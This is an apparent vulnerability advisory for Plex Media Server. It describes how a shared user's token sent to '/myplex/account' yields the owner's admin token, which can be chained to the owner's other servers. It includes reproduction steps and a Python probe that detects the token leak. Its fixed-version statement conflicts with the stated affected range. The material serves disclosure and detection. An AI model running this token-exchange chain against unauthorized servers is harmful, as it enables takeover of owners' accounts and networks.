Plex Media Server Token Mismanagement Vulnerability Allowing Privilege Escalation

Vulnerability

Plex Media Server (PMS) through version 1.42.2.10156 lets a client that holds only a transient access token retrieve a permanent one by querying the '/myplex/account' endpoint. The root cause is improper token management: temporary credentials can be exchanged for permanent ones, which undermines the intended security model. In addition, revoking a device's access does not invalidate its token, so the device, and any users it was shared with, can still be impersonated after revocation.

Impact

Exploitation could give an attacker the server owner's account, including administrative privileges on the server and, through the Plex.tv API, access to the owner's other servers. The result can be a network-wide compromise of interconnected Plex servers.

Reproduction

To reproduce, authenticate as a non-owner user who has shared access to the server and capture that user's access token (PMS accepts it as the X-Plex-Token header or query parameter) from the browser developer tools network tab. Send a GET request to the '/myplex/account' endpoint with that token. The response contains the owner's administrative token, which can in turn be used against the owner's other servers to obtain their owner tokens, continuing the chain.
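The probe below is an added example, not code from the advisory or from Plex. It sends the shared user's token to '/myplex/account' and reports whether the server hands back a different token. The response is assumed to be XML whose root <MyPlex> element carries the token in an `authToken` attribute; that element and attribute name, the sample response, and the token values are constructed for illustration. Only run the network function against servers you are authorized to test.

```python
"""Probe for the PMS token-exchange issue on /myplex/account (added example)."""
import sys
import urllib.request
import xml.etree.ElementTree as ET
from typing import Optional


def extract_auth_token(xml_text: str) -> Optional[str]:
    """Return the token from the response, or None if none is present.

    Assumption: the root element is <MyPlex> with an `authToken` attribute.
    """
    root = ET.fromstring(xml_text)
    return root.attrib.get("authToken")


def token_exchange_leaks(supplied_token: str, xml_text: str) -> bool:
    """True when the server returned a token that differs from the one we sent.

    A shared user querying with their own transient token should never be
    handed a different (owner) token; a mismatch indicates the vulnerable
    behaviour described in the advisory.
    """
    returned = extract_auth_token(xml_text)
    return bool(returned) and returned != supplied_token


def fetch_myplex_account(base_url: str, token: str, timeout: float = 10.0) -> str:
    """GET /myplex/account with the token in the X-Plex-Token header."""
    url = base_url.rstrip("/") + "/myplex/account"
    req = urllib.request.Request(
        url,
        headers={"X-Plex-Token": token, "Accept": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample response (not a real capture) in the assumed shape.
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<MyPlex authToken="OWNERTOKEN0000000000" username="owner" '
    'publicAddress="203.0.113.10"/>'
)
SAMPLE_NO_TOKEN = '<?xml version="1.0" encoding="UTF-8"?>\n<MyPlex username="owner"/>'


def probe(base_url: str, shared_user_token: str) -> bool:
    """Run the live check; returns True if the server leaks a different token."""
    body = fetch_myplex_account(base_url, shared_user_token)
    return token_exchange_leaks(shared_user_token, body)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: probe.py http://server:32400 SHARED_USER_TOKEN", file=sys.stderr)
        sys.exit(2)
    leaked = probe(sys.argv[1], sys.argv[2])
    print("token exchange leaks a different token" if leaked else "no different token returned")
    sys.exit(1 if leaked else 0)
```

The parsing and comparison are kept separate from the network call so the decision logic can be checked against captured responses offline. A returned token equal to the one supplied is not treated as a finding; only a different token is.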

Remediation

Update to the patched release of Plex Media Server; this advisory names version 1.42.1 or later as fixed. Because the affected range above extends through 1.42.2.10156, verify the fixed build number against the vendor's release notes before treating an installation as remediated, and revoke and reissue device tokens after upgrading, since tokens issued to revoked devices remained usable on affected versions.

Added: Jan 2, 2026, 5:23 PM
Updated: Jan 2, 2026, 5:23 PM

Vulnerability Rating

Custom Algorithm

spread: 7.6
impact: 5.0
exploitability: 6.3
remediation: 7.7
relevance: 1.8
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.